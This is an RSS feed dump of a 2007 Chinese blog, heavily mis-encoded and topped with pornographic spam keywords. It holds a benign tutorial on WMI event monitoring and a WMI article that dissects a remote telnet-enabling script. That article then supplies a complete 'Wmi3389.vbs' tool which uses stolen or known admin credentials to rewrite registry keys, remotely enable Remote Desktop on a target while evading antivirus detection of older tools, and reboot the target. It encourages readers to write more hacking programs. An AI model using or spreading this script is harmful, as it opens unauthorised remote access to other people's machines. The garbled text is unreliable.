??xml version="1.0" encoding="utf-8" standalone="yes"?>欧美xxxxxxxxx,嗯用力啊快一点好舒服小柔久久,丝瓜av网站精品一区二区http://www.aygfsteel.com/Jiangzy/category/20791.htmlq个世界上只有两样东西愈分n愈多,那就是智慧与爱?/description>zh-cnWed, 21 Mar 2007 03:10:05 GMTWed, 21 Mar 2007 03:10:05 GMT60WMI基础知识 http://www.aygfsteel.com/Jiangzy/articles/104955.html飛雪(leo)飛雪(leo)Tue, 20 Mar 2007 06:14:00 GMThttp://www.aygfsteel.com/Jiangzy/articles/104955.htmlhttp://www.aygfsteel.com/Jiangzy/comments/104955.htmlhttp://www.aygfsteel.com/Jiangzy/articles/104955.html#Feedback0http://www.aygfsteel.com/Jiangzy/comments/commentRss/104955.htmlhttp://www.aygfsteel.com/Jiangzy/services/trackbacks/104955.html WMI基础知识
2006-11-11 02:15
一QWMI基础知识 (tng)
==================================================================================== (tng)
WMI 最初于1998q作Z个附加组件与 (tng)Windows (tng)NT (tng)4.0 (tng)Service (tng)Pack (tng)4 (tng)一起发行,是内|在Windows (tng)2000?Windows (tng)XP和W(xu)indows (tng)Server (tng)2003 (tng)pd操作pȝ中核?j)的理支持技术。基于由 Distributed (tng)Management (tng)Task (tng)Force (tng)(DMTF) (tng)所监督的业界标准,W(xu)MI是一U规范和基础l构Q通过它可以访问、配|、管理和监视几乎所有的Windows资源。大多用户习(fn)惯于使用众多的图形化理工具来管理Windows资源Q在WMI之前q些工具都是通过 Win32应用E序~程接口(Application (tng)ProgrammingInterfacesQAPI)来访问和理Windows资源的。只要你熟?zhn)pȝ~程你就知道API有多么重要。但是大多数脚本语言都不能直接调用Win32 (tng)APIQW(xu)MI的出C得系l管理员可以通过一U简便的Ҏ(gu)卛_用常见的脚本语言实现常用的系l管理Q务。?
利用WMI需要和脚本如WSH和VBScriptl合hQ可以实现的功能大家可以看微软的MSDN文。?
在编写我们自q脚本之前Q我们需要对WMI的体pȝ构有个基本的?jin)解。如图一Q?1.gif) (tng)
在WMI 体系l构中我们最需要关?j)的是WMI提供E序QW(xu)MI提供E序在WMI和托资源之间扮演着中间方的角色。提供程序代表用者应用程序和脚本从WMI托管资源h信息Qƈ发送指令到WMI托管资源。下面是我们利用WMI~程l常要用到的WMI内置提供E序清单Q以供编E参考。?
1.Active (tng)Directory提供E序 (tng)
链接库文Ӟ(x)dsprov.dll (tng)
命名I间Qroot\directory\ldap (tng)
作用Q将Active (tng)Directory (tng)对象映射刊WWMI。?

2.事g日志提供E序 (tng)
链接库文Ӟ(x)ntevt.dll (tng)
命名I间Qroot\cimv2 (tng)
作用Q管理?tng)Windows (tng)事g日志Q例如,d、备份、清除、复制、删除、监视、重命名、压~、解压羃和更改事件日志设|。?

3.注册表提供程序?
链接库文Ӟ(x)stdprov.dll (tng)
命名I间Qroot\default (tng)
作用Q读取、写入、枚举、监视、创建、删除注册表和倹{?

4.Win32 (tng)提供E序 (tng)
链接库文Ӟ(x)cimwin32.dll (tng)
命名I间Qroot\cimv2 (tng)
作用Q提供关于计机、磁盘、外围设备、文件、文件夹、文件系l、网l组件、操作系l、打印机、进E、安全性、服务、共享、SAM (tng)用户?qing)组Q以?qing)更多资源的信息。?

5.Windows (tng)安装E序提供E序 (tng)
链接库文Ӟ(x)msiprov.dll (tng)
命名I间Qroot\cimv2 (tng)
作用Q提供对已安装Y件信息的讉K。?

从上面可以看出在WMI中类Q即内置提供E序Q被分组到命名空间中Q命名空间可以看成是一个组。比如,命名I间 (tng)root\cimv2 (tng)包括大部分表C通常与计机和操作系l相兌的资源的cR在使用cȝ时候要说明cL在的命名I间。类由属性和Ҏ(gu)构成。这是可视化~程中的两个重要的概c(din)属性描q的是对象的状态,Ҏ(gu)是对象可以执行的操作。?
理论知识学v来很枯燥Q下面让我们边分析高手的脚本源码边进行理论知识的巩固吧。?

二:(x)解析RTCS.VBS主要代码 (tng)
===================================================================================== (tng)
有时候阅d人的源码未尝不是一个好而且快捷的办法,下面p我们来认真学?fn)zzzEVAzzz~写的一个可以远E开启telnet服务的脚本RTCS.VBS。?
该脚本可以直接访问目标的WMI,不依赖于目标的ipc$,实现q程开?关闭目标telnet服务Qؓ(f)?jin)方便大家学习(fn)我抽出了(jin)最主要的代码,具体分析如下Q?
set (tng)objlocator=createobject("wbemscripting.swbemlocator") (tng)
//创徏WbemScripting.SwbemLocator对象(脚本接口)。?
//可以看出WMI其实是把ComlgWbemScripting.SWbemLocator装h|了(jin)。?
set (tng)objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password) (tng)
//通过ConnectServer函数hq接到WMI控g服务上,root/default为命名空间。?
set (tng)objinstance=objswbemservices.get("stdregprov") (tng)
//建立讉K注册表的实例。?
set (tng)objmethod=objinstance.methods_("SetDWORDvalue") (tng)
//建立可以更改注册表键值的Ҏ(gu)。?
set (tng)objinparam=objmethod.inparameters.spawninstance_() (tng)
//MethodData.InParameters用于获取或设|方法的输入参数。这里用spawninstanceҎ(gu)为它建立一个子实例Q下面就可以参数D予这个对象的属性。?
objinparam.hdefkey=&h80000002 (tng)
//hdefkey表示栚wQ根键的十六制值如下:(x) (tng)
//HKEY_CLASSES_ROOT (tng)(&H80000000) (tng) (tng)
//HKEY_CURRENT_USER (tng)(&H80000001) (tng) (tng)
//HKEY_LOCAL_MACHINE (tng)(&H80000002) (tng) (tng)
//HKEY_USERS (tng)(&H80000003) (tng) (tng)
//HKEY_CURRENT_CONFIG (tng)(&H80000005) (tng) (tng)
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0" (tng)
//ssubkeyname表示子键。?
objinparam.svaluename="NTLM" (tng)
//svaluename表示属性名。?
objinparam.uvalue=ntlm (tng)
//uvalue表示键倹{?
set (tng)objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) (tng)
//利用execmethod执行Ҏ(gu)Q这里才真正改写?jin)注册表。?

//下面是修改telnet服务的TelnetPort|原理同上。?
objinparam.svaluename="TelnetPort" (tng)
objinparam.uvalue=port (tng)
set (tng)objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) (tng)

修改telnet的注册表部分完成了(jin)Q将NTLM和TelnetPortq行?jin)修改,要是?gu)的telnet服务没有开启呢Q下面就需要根据telnet的具体情况,来启动telnet服务Ql看代码。?

//首先查询q程L上tlntsvr的启动方式。?
set (tng)objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password) (tng)
//win32_servicecdroot\cimv2命名I间中,作用没忘记吧Q快看基知识c(din)?
set (tng)colinstances=objswbemservices.execquery("select (tng)* (tng)from (tng)win32_service (tng)where (tng)name='tlntsvr'") (tng)
//注意Q查询都是通过枚D来实现的。?
for (tng)each (tng)objinstance (tng)in (tng)colinstances (tng)
if (tng)objinstance.startmode="Disabled" (tng)then (tng)
set (tng)objmethod=objinstance.methods_("changestartmode") (tng)
//创徏changestartmodeҎ(gu)来改变tlntsvr的启动方式。?
set (tng)objinparam=objmethod.inparameters.spawninstance_() (tng)
objinparam.startmode="Manual" (tng)
//启动方式改为手动方式。?
set (tng)objoutparam=objinstance.execmethod_("changestartmode",objinparam) (tng)
end (tng)if (tng)

//下面启动我们的telnet服务。这里zzzEVAzzz的思\好象有点不对Q也不知道是不是他的疏忽Q我个h认ؓ(f)当telnet服务已经启动时不应该用stopserviceҎ(gu)停止服务。?
if (tng)objinstance.started=true (tng)then (tng)
intstatus=objinstance.stopservice() (tng)
//stopservice是WMI中用于停止服务实例的服务的方法。?
else (tng)
intstatus=objinstance.startservice() (tng)
end (tng)if (tng)
next (tng)

三:(x)手把手教你编写WMI版本的ROTS.vbs来开?389 (tng) (tng)
===================================================================================== (tng)
zzzVEAzzz 的脚本就分析到这里吧Q怎么P很EASY吧?Q我怿大家现在一定蠢蠢欲动了(jin)Q?)好,一h写一个什么程序呢QROTS.vbs我想大家一定都用过吧?什么东东啊Q我……砸!大家应该知道q个ROTS是有它的使用条g的,不仅要有理员帐Pq要允许q行ipcq接Q在q个到处都是墙的q代Qipc 早就不实用了(jin)Q而且ROTS.vbs早就被查杀?jin),那该怎么办?当然是自己动手了(jin)。能不能实现ROTS的一L(fng)q程开?389的功能而不受ipc的限制呢Q答案自从我写了(jin)q篇文章后成定的Q哈哈,吹吹?jin)。?
当然我们也是要求pȝ臛_?000server?qing)以上的Q最q看到有个Y件可以给2000pro开3389Q由于比较忙Q也没怎么ȝ它,q里我们暂且不说它,知道?jin)原理一样好办。?
开?389有个注册表导入的Ҏ(gu)Q其它一些Y件的开法,我想也大多是通过修改注册表实现的。这个方法需要导入如下的注册表:(x) (tng)
Windows (tng)Registry (tng)Editor (tng)Version (tng)5.00 (tng)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] (tng) (tng)
"Enabled"="0" (tng) (tng)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows (tng)NT\CurrentVersion\Winlogon] (tng) (tng)
"ShutdownWithoutLogon"="0" (tng) (tng)
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] (tng) (tng)
"EnableAdminTSRemote"=dword:00000001 (tng) (tng)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal (tng)Server] (tng) (tng)
"TSEnabled"=dword:00000001 (tng) (tng)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] (tng) (tng)
"Start"=dword:00000002 (tng) (tng)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] (tng) (tng)
"Start"=dword:00000002 (tng) (tng)
[HKEY_USERS\.DEFAULT\Keyboard (tng)Layout\Toggle] (tng) (tng)
"Hotkey"="1" (tng) (tng)

原理知道?jin)就没什么难的了(jin)Q先理清我们的思\Q我们的主要d是更Ҏ(gu)册表里的键倹{首先是创徏WMI对象Q然后是q接到远EWMI服务器,最后修Ҏ(gu)册表键倹{?
部分主要代码如下Q完整的代码和详l的注释L(fng)附带的Y件包Q?

on (tng)error (tng)resume (tng)next (tng)
//防止出现意外。?
set (tng)outstreem=wscript.stdout (tng)
if (tng)(lcase(right(wscript.fullname,11))="wscript.exe") (tng)then (tng)
set (tng)objShell=wscript.createObject("wscript.shell") (tng)
objShell.Run("cmd.exe (tng)/k (tng)cscript (tng)//nologo (tng)"&chr(34)&wscript.scriptfullname&chr(34)) (tng)
//cmd后带/K参数表示执行字符串指定的命o(h)。?
wscript.quit (tng)
end (tng)if (tng)
//q行单的(g)查。?
if (tng)wscript.arguments.count<3 (tng)then (tng)
usage() (tng)
wscript.echo (tng)"Not (tng)enough (tng)parameters." (tng)
wscript.quit (tng)
end (tng)if (tng)
//取出参数Q分别赋予几个变量。?
ipaddress=wscript.arguments(0) (tng)
username=wscript.arguments(1) (tng)
password=wscript.arguments(2) (tng)
option=wscript.arguments(3) (tng)
usage() (tng)

下面是核?j)代码,也是实现q程修改注册表的功能Q我q里l出另外一U实现的方式Q对照前面的代码很容易理解,我就只作单的解释?jin)。详l情况可以参阅MSDN文中关于StdRegProvcȝ说明。?
Qhttp://msdn.microsoft.com/library/default.asp?url=/library/en-us/wmisdk/wmi/stdregprov.aspQ?

const (tng)HKEY_LOCAL_MACHINE (tng)= (tng)&H80000002 (tng)
const (tng)HKEY_USERS=&H80000003 (tng)
strComputer (tng)= (tng)ipaddress (tng)

//获取wmi对象 (tng)
Set (tng)oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" (tng)&_ (tng) (tng)
strComputer (tng)& (tng)"\root\default:StdRegProv") (tng)

strKeyPath (tng)= (tng)"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" (tng)
strValueName (tng)= (tng)"Enabled" (tng)
strValue=0 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)"SOFTWARE\Microsoft\Windows (tng)NT\CurrentVersion\Winlogon" (tng)
strValueName (tng)= (tng)"ShutdownWithoutLogon" (tng)
strValue=0 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)"SOFTWARE\Policies\Microsoft\Windows\Installer" (tng)
strValueName (tng)= (tng)"EnableAdminTSRemote" (tng)
strValue=1 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)"SYSTEM\CurrentControlSet\Control\Terminal (tng)Server" (tng)
strValueName (tng)= (tng)"TSEnabled" (tng)
strValue=1 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)"SYSTEM\CurrentControlSet\Services\TermDD" (tng)
strValueName (tng)= (tng)"Start" (tng)
strValue=2 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)"SYSTEM\CurrentControlSet\Services\TermService" (tng)
strValueName (tng)= (tng)"Start" (tng)
strValue=2 (tng)
oReg.SetDWORDValue (tng)HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue (tng)

strKeyPath (tng)= (tng)".DEFAULT\Keyboard (tng)Layout\Toggle" (tng)
strValueName (tng)= (tng)"Hotkey" (tng)
strValue=1 (tng)
oReg.SetDWORDValue (tng)HKEY_USERS,strKeyPath,strValueName,strValue (tng)

//下面实现重启q程机器 (tng)
if (tng)option="/r" (tng)then (tng) (tng)
outstreem.write (tng)"Now, (tng)rebooting (tng)target...." (tng)
strwmiquery="select (tng)* (tng)from (tng)win32_operatingsystem (tng)where (tng)primary=&apos;true&apos;" (tng)
set (tng)colinstances=objswbemservices.execquery(strwmiquery) (tng)
for (tng)each (tng)objinstance (tng)in (tng)colinstances (tng)
objinstance.win32shutdown(2) (tng)
end (tng)if (tng)
outstreem.write (tng)"Ok, (tng)rebooted (tng)the (tng)target." (tng)

//单的用法说明的函数。?
function (tng)usage() (tng)
wscript.echo (tng)string(60,"=") (tng)
wscript.echo (tng)"Wmi3389 (tng)v1.0.0" (tng)
wscript.echo (tng)"No (tng)ipc (tng)Open (tng)3389, (tng)code (tng)written (tng)by (tng)pye." (tng)
wscript.echo (tng)"Welcome (tng)to (tng)visite (tng)www.coon.cn (tng)or (tng)Mail (tng)to (tng)grandh4408@yahoo.com.cn" (tng)
wscript.echo (tng)"Usage:" (tng)
wscript.echo (tng)"cscript (tng)"&wscript.scriptfullname&" (tng)targetIP (tng)username (tng)password (tng)[/r]" (tng)
wscript.echo (tng)"/r (tng)reboot (tng)the (tng)target (tng)this (tng)is (tng)optional" (tng)
wscript.echo (tng)"It (tng)use (tng)WMI (tng)to (tng)Open (tng)3389 (tng)of (tng)target (tng)server." (tng)
wscript.echo (tng)string(60,"=")&vbcrlf (tng)
end (tng)function (tng)
上面的代码复制带记事本里,保存?sh)Wmi3389.vbs。然后在CMD里执行:(x) (tng)
cscript (tng)Wmi3389.vbs (tng)ipaddress (tng)administrator (tng)password (tng)[/r] (tng)
看看是不是和ROTS.vbs有一L(fng)效果啊?大家赶快实践实践吧。?

四:(x)最后的唠叨 (tng)
===================================================================================== (tng)
大家可以看出WMI的功能是很强大的Q这里要感谢MicroSoft?jin),它是永远都不会(x)让我们失望的。WMI对象允许通过VBQVBAQW(xu)SHQ? (tng)VBScriptQ?tng)JScriptQASPQ或是支持自动对象的其它环境Q对WMIq行完全讉K。在参考查询体pM加入 WMI (tng)Scripting (tng)V1.1 (tng)Library (tng)Q则Visual (tng)Basic或是VBAҎ(gu)可以访问这些对象了(jin)。支持ActiveXE序的操作^台可以通过对象cȝ代号Q或是类的名U创些对象,q些对象的前~是WbemScriptingQ如 WbemScripting.SwbemLocator。所以大家有兴趣的完全可以利用VBQW(xu)SHQVBScriptQ?tng)JScriptQASP{编写更多的利用WMI的黑客程?/font>


飛雪(leo) 2007-03-20 14:14 发表评论
]]>WMI事g?http://www.aygfsteel.com/Jiangzy/articles/104847.html飛雪(leo)飛雪(leo)Mon, 19 Mar 2007 16:13:00 GMThttp://www.aygfsteel.com/Jiangzy/articles/104847.htmlhttp://www.aygfsteel.com/Jiangzy/comments/104847.htmlhttp://www.aygfsteel.com/Jiangzy/articles/104847.html#Feedback0http://www.aygfsteel.com/Jiangzy/comments/commentRss/104847.htmlhttp://www.aygfsteel.com/Jiangzy/services/trackbacks/104847.html我们在q个月尝试一U略显激q的方式。一般情况下Q我们这个专栏主要采取针对从化名脚本~程人员那里收到的某一常见问题加以解答的方式。而这ơ,我们不再沿袭以往做法。取而代之的是,我们回{一个自己尚未(或至几乎未曾)(j)从脚本编Eh员那里听说的问题?

很少有h向我询问有关WMI事g的问题。这U情늜上去q不正常。WMI的确具备非常“酷”的功能Ҏ(gu)?-或许多少有些复杂--但迄今ؓ(f)止,我们未收到q有兛_的Q何问题。这U情冉|否出于广大专业h员对WMI所具备的事件处理能力尚不熟(zhn)的~故Q亦或出于从未有人向(zhn)介l过有关情况Q而?zhn)也没有碰巧读到过合适的书籍Q?

好吧Q就情늚如此,而本月的专栏文章则将围绕q一主题向?zhn)q行要介l。尽?zhn)应可凭借这专栏文章蹒跚学步,q了(jin)解有关WMI事g的些许皮毛,然而,我们仍希望?zhn)臛_对WMI事g的常规工作方式具备最基本的认识,q将Ҏ(gu)大有帮助。如果?zhn)需要在l箋(hu)阅读本文之前先对WMIq行一ơ速成式学?fn),那么Q我们便强烈(zhn)选用位于MSDN的WMI入门指南pd教材Q?zhn)只需阅读该系列教材的W一部分Q即可掌握与事g有关的入门知识,qؓ(f)l箋(hu)学习(fn)事g技术奠定良好基?

好的Q在我们开始学?fn)WMI事g之前Q或许应所谓“事件”的含义达成p。事件是指那些发生在计算机环境内部的对象。实际上Q那些只是潜在的事gQ而当(zhn)对某一事物的发生给予关注时Q它才算的上真正发生Q而这是一个事件?

而言之,W(xu)MI事g正是(zhn)所x(chng)对象--也就是说Q?zhn)所需获得通知的对?-已经发生的通知。D例来_(d)(zhn)也许希望在Web服务器的处理器用M比率过90Q这一阈值时接到有关通知Q以便设|一定数量的间歇。或许?zhn)q希望在本公司文件服务器d储容量占用率低于10Q的情况下接到相关通知。而W(xu)MI事g则是一U由WMI提供的机Ӟ可帮助?zhn)借助某一特定脚本针对pȝ变化q行相应配置Q执行接收操作,q做出必要响应?

而针对WMI加以理解的另一U方法则是,W(xu)MI事g对于WMI来说Q就如同警报信息对于性能监视器、陷阱对于SNMP和规则对于Microsoft操作理器(MOMQ所h的意义。以上四l关pM表着针对pȝ和(或)(j)|络变化q行监视或做出反应的具体方式?

话已l说得够多?jin)。现在让我们开始编写脚本。以下脚本主要用来针对基于本地计机Q也是(zhn)赖以运行脚本的计算机)(j)的进E实施监控。而该脚本所L的事件则是notepad.exeq程的创建。如需对这个脚本加以试用,则请其输入C本,q保存(sh)ؓ(f)MonitorNotepad.vbs。接着Q打开一个命令行H体QƈD至保存有下列脚本的目录,然后Q输入C:\scripts>cscript MonitorNotepad.vbs?

strComputer = "."

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

strWQL = "SELECT * " & _
         "FROM __InstanceCreationEvent " & _ 
         "WITHIN 2 " & _
         "WHERE TargetInstance ISA 'Win32_Process' " & _
         "AND   TargetInstance.Name = 'notepad.exe'"

WScript.Echo "Waiting for a new instance of Notepad to start..."
Set objEventSource = objWMIService.ExecNotificationQuery(strWQL)
Set objEventObject = objEventSource.NextEvent()
WScript.Echo "A new instance of Notepad was just started."

在脚本运行过E中Q?zhn)?x)看到如下图所C的情况出现Q?


如果(zhn)所使用的浏览器无法支持嵌入式框Ӟ? 点击此处 以便在单独页面中q行览?

如果(zhn)接着q行?jin)一个新的记事本实例Q该脚本便会(x)做出如下反应Q?


如果(zhn)所使用的浏览器无法支持嵌入式框Ӟ? 点击此处 以便在单独页面中q行览?

如图所C,(zhn)目前已具备?jin)针对记事本q程实施监控的能力。而这U能力将有助于?zhn)避免长达数小时的无效力_Q难道不是吗Q好吧,或许情况q(sh)致于此。但事实却是Q?zhn)可在M具备WMI支持Ҏ(gu)的计算备上利用与上q脚本相似的其它脚本针对M由WMI负责理的资源实施监控,从这个角度来看,事g脚本则可帮助(zhn)避免长达数时的无效劳动?

试想(zhn)拥有一台非常繁忙的企业内部|络服务器,q在此基上进一步假设?zhn)的企业Web开发部门偶?dng)?x)某些有害代码发布至上述企业内部|络服务器,而这些有害代码则可能莫名其妙地设法杀ȝ关Web服务。每当有Web服务l止Q?zhn)的用户便会(x)有所反应。而首当其冲的修复Ҏ(gu)Q尽只能应付燃眉之急)(j)则是重新启动刚刚遭到l止的Web服务。如果?zhn)能够以自动化方式完成上述处理q程Q那是一U相当有用的功能Ҏ(gu)。下列脚本ؓ(f)(zhn)展CZ(jin)实现上述功能的具体方法。该脚本针寚w到终止的Web服务q行(g),q试N新启动相x(chng)务。请在?zhn)键入该脚本的q程中注意分辨它与前面那个记事本监控脚本的区别所在?

StrComputer = ??
Set objWMIService = GetObject(“winmgmts://?& strComputer & ?root/cimv2?
strWQL = “SELECT * ?& _
         “FROM __InstanceModificationEvent ?& _ 
         “WITHIN 2 ?& _
         “WHERE TargetInstance ISA ‘Win32_Service??& _
         “AND   TargetInstance.Name = ‘w3svc’?& _
         “AND   TargetInstance.State = ‘Stopped’?
Set objEventSource = objWMIService.ExecNotificationQuery(strWQL)
Wscript.Echo “Monitoring the web service…?
Set objEventObject = objEventSource.NextEvent()
Wscript.Echo “The web service just stopped.?

Zw体验上q脚本的q行效果Q请其键入C本界面,q保存(sh)ؓ(f)MonitorWeb.vbs。接下来Q应保W3SVC服务在本地计机上处于运行状态(使用net start w3svc命o(h)是一U非常有效的Ҏ(gu)Q。然后,在一个命令行H体内键入C:\scripts>cscript MonitorWeb.vbsQ以便开始运行该脚本。于是,(zhn)便?x)看到如下图所C的情况出现Q?


如果(zhn)所使用的浏览器无法支持嵌入式框Ӟ? 点击此处 以便在单独页面中q行览?

接下来,h开另一个命令行H体Qƈ通过键入C:\>net stop w3svc的方式终止相关Web服务。而该脚本则应注意到相关Web服务已被l止Qƈ为?zhn)昄一条相关信息:(x)


如果(zhn)所使用的浏览器无法支持嵌入式框Ӟ? 点击此处 以便在单独页面中q行览?

在这一时点Q该脚本仅仅使用?jin)下面这行代码即已侦到Web服务已被l止Q?

WScript.Echo "The web service just stopped."

q行代码主要用来昄一条相关信息;当然Q?zhn)q可通过d代码的方式轻而易丑֜实现Web服务重启Qƈ为确保重启功能有效而再ơ执行检查,同时Q发送给(zhn)一针对已发生所有事件加以简要概括的?sh)子邮g。那些曾览q“脚本O谈”专栏开文章的读者将可借助Run或ExecҎ(gu)轻而易丑֜q行“net start w3svc”命令。而那些已通过查阅WMI入门pdȝ方式深入ȝqWMI的朋友则可运用WMI实现相关服务的重新启动。在M情况下,q种操作都将是非常直截了(jin)当的。下面提供了(jin)一个利用RunҎ(gu)辑ֈ上述目的的示例脚本:(x) 

strComputer = "."

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

strWQL = "SELECT * " & _
         "FROM __InstanceModificationEvent " & _ 
         "WITHIN 2 " &_
         "WHERE TargetInstance ISA 'Win32_Service' " & _
         "AND   TargetInstance.Name = 'w3svc'" & _
         "AND   TargetInstance.State = 'Stopped'"

Set objEventSource = objWMIService.ExecNotificationQuery(strWQL)

WScript.Echo "Monitoring the web service..."
Set objEventObject = objEventSource.NextEvent()

WScript.Echo "Web service just stopped....waiting for a few seconds."
WScript.Sleep(5000)
WScript.Echo "Attempting to restart the web service using the net.exe tool."

Set objShell = CreateObject("WScript.Shell")
objShell.Run "%COMSPEC% /c net start w3svc",,1
WScript.Echo "Restarted the web service"

如需试q行上述脚本Q请务必保相关Web服务Qw3svcQ正处于q行状态,q在此基上执行该脚本。一旦脚本显C如下信息:(x)Monitoring the web service…(正在对Web服务q行监视……)(j)Q就h开W二个命令行H体Qƈ通过键入type C:\>net stop w3svc的方法终止相x(chng)务。而该脚本则应觉察到相关Web服务已被l止Q接着Q脚本将暂停几秒钟,以确保服务关闭操作执行完毕,然后Q脚本将通过发出net start w3svc指o(h)的方式重新启动相x(chng)务。下囑ֱCZ(jin)上述脚本在执行过E中所输出的信息:(x)


如果(zhn)所使用的浏览器无法支持嵌入式框Ӟ? 点击此处 以便在单独页面中q行览?

令h充满希望的是Q?zhn)卛_开始对某些问题隐?zhn)l予x(chng)。如果?zhn)的确希望如此Q便有可能对有关上述某一脚本的逐行解释抱有兴趣--而这恰恰是我们即在本月中全力提供的信息服务内容?

脚本代码行:(x) 

strComputer = "."

仅仅用来?zhn)执行相关操作所需依托的计机名称存储于当前脚本的下一行。引号中的圆点(?”)(j)表示“用本地计机”。如果?zhn)目前正处在某一|络环境下,而自己又是基于附q另一台计机的本地管理员Q则可尝试将strComputer变量讑֮己所使用的计机名称Q例如,strComputer = “WebServer01”)(j)--也就是说Q用当前计算机名U替换圆炏V这样一来,监控脚本便可Z自n实际q行所依托的远E计机Q而非本地计算机)(j)执行监控操作?

脚本代码行:(x) 

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

创徏一个通往WMI服务的连接,q将针对该连接的引用保存?sh)objWMIService变量。事实上Q这行代码具有一定的前作用QƈZq连接指定了(jin)一个专用WMI名称I间--?root/cimv2名称I间。?zhn)可将所谓名U空间当作某些类g文g夹的事物看待。所不同的是Q文件夹仅供用来一pd特定文gl织在一P而W(xu)MI名称I间则可实现一整套WMIcȝ有机l合?root/cimv2名称I间恰好同时存放着Win32_Service WMIcdW(xu)in32_Process WMIc,因此Q可供在我们讑֮的全部示例中加以应用。事实上Q?root/cimv2名称I间存储着关系到系l管理利弊得ql大多数WMIc?-因此Q?zhn)会(x)经常在自己的脚本中看到它ƈ使用它。只要?zhn)接触到这个名U空_(d)我们便可告诉(zhn)cimv2位所代表的含?-它是Common Information Model, version 2Q通用信息模型2.0版)(j)的羃写。如果?zhn)有兴?jin)解与q一名称h有关的更多信息资料以?qing)WMI自n的历史渊源,p做好(zhn)心(j)M的准备,q回头访问分布式理d团队QDMTFQ网站?

接下来的一pd代码行主要用来构成一个WMI Query LanguageQWMI查询语言QW(xu)QLQ查询。由于这U特D查询方式主要被用来启动事g监控E序Q因此,l常被h们当作事仉知查询加以q用。如果?zhn)对SQL较ؓ(f)熟?zhn)Q便?x)觉得这U查询方式与之大同小异。如果?zhn)对SQL也不甚了(jin)解,照样不必担心(j)Q?zhn)只需对这U查询中部分元素所引用的对象加以理解把握,以便在需要时对它们进行相应修改,从而,辑ֈ调整查询内容的目的?

W一个重要的代码位是__InstanceModificationEvent。它?yu)可被修?gu)__InstanceCreationEvent或__InstanceDeletionEvent。所q有一炚w常明,举例来说Q将q个代码位修Ҏ(gu)__InstanceDeletionEvent的做法会(x)D脚本攑ּ对调整事件的监视Q{而对删除事gq行监控?

WITHIN 2子句主要用来以秒为单位就某项资源的轮询事件发生频率加以设定。每隔两U对某一对象q行一ơ检查的做法在大多数情况下或许略NJ,但我们在CZ中设定这一频率的目的无非是希望产生一U快L(fng)观的效果?

ISA ‘Win32_Service’子句主要针对用以指代?zhn)所需监控对象的WMIc进行设定。如果?zhn)?gu)关WMIcȝ知识不甚?jin)解Q就误问MSDN|站Qƈ阅读WMI入门文章。如果?zhn)需要查扑֏供加以应用的WMIc,则应下蝲ScriptomaticQƈ对其加以试用?

.Name = ‘w3svc’和.State = ‘Stopped’子句仅仅是用来监控对象局限于某项特定资源的属性设定代?-在这个示例中Q我们ؓ(f)Win32_Service指定?jin)一个等于‘w3svc’的NameQ名Uͼ(j)属性和一个等于‘Stopped’的StateQ状态)(j)属性?

StrWQL = “SELECT * ?& _
         “FROM __InstanceModificationEvent ?& _ 
         “WITHIN 2 ?& _
         “WHERE TargetInstance ISA ‘Win32_Service??& _
         “AND   TargetInstance.Name = ‘w3svc’?& _
         “AND   TargetInstance.State = ‘Stopped’?

接下来的代码行旨在通过q行通知查询的方式从实际上启动监视进E?

Set objEventSource = objWMIService.ExecNotificationQuery(strWQL)

~写q个代码行的目标仅仅在于监视进E已l开始的情况告知用户?

Wscript.Echo “Monitoring the web service…?

下一个代码行的作用较为重要。它?yu)脚本处于暂停状态,直到E序接收C一个事件。相x(chng)作将在这个控制点中止Q而脚本的后箋(hu)部分直到已被我们讑֮为监控对象的事g发生q已向我们发出通知的时候才?x)l运行?

Set objEventObject = objEventSource.NextEvent()

脚本一旦收到有关事件发生情늚通知Q便?x)越q暂停或L代码行,l箋(hu)q行随后出现的指令。而随后出现的指o(h)则是(zhn)针对相关通知所应做出的响应。在q个CZ中,我们只需让用L(fng)道事仉知已被收到卛_?

WScript.Echo "The web service just stopped."

q种技巧也许在某些特定情况下具有实用h(hun)|但更多时候,(zhn)往往更需要在q个控制Ҏ(gu)行某特D操作?

到此为止Q?zhn)已掌握?jin)必要的知识技?-也就是说Q我们已WMI事g初步介绍l?zhn)。虽然我们讨厌成为clichéQ但是,(zhn)在某些情况下将不得不ؓ(f)从事脚本~写工作的同僚多付出一些周折:(x)“我们只不过刚刚接触到这U具备较高实用h(hun)值的理技术的皮毛”。这也就是说Q我们希望自己已在此为?zhn)提供了(jin)够的信息资料Q而?zhn)则可借助q些信息资料围绕WMI事g处理功能应用于自w所处工作环境的具体实现方式展开思考。下个月Q我们将l箋(hu)深入探讨本文所涉及(qing)的内容,q希望针对广大读者围l本文所提出的疑N题加以解{。还是那句老话Q如果?zhn)针对本文产生了(jin)某些非常“酷”ƈQ或Q具有实用h(hun)值的x(chng)Q就h信告知我们?

我们衷心(j)希望(zhn)渡q一个安全而愉快的假期?

脚本专家l?

